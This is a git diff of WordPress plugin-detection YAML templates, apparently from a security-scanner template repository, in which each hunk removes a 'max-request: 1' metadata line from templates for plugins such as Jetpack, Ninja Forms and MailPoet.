diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c21d414695..1e6a62e23b 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: - max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 91c89d0ad8..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: - max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 539d9f7cec..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: - max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index f4123bb594..22bfa3ffe2 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: - max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 254f916291..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: - max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 8074ac337e..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: - max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b9de0ee313..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: - max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 7b0f188ff7..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: - max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 898e4de56d..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: - max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 8033aacbc6..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: - max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 3da2ea50e1..bbc305b8de 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 1db1b57708..81f58198d3 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git 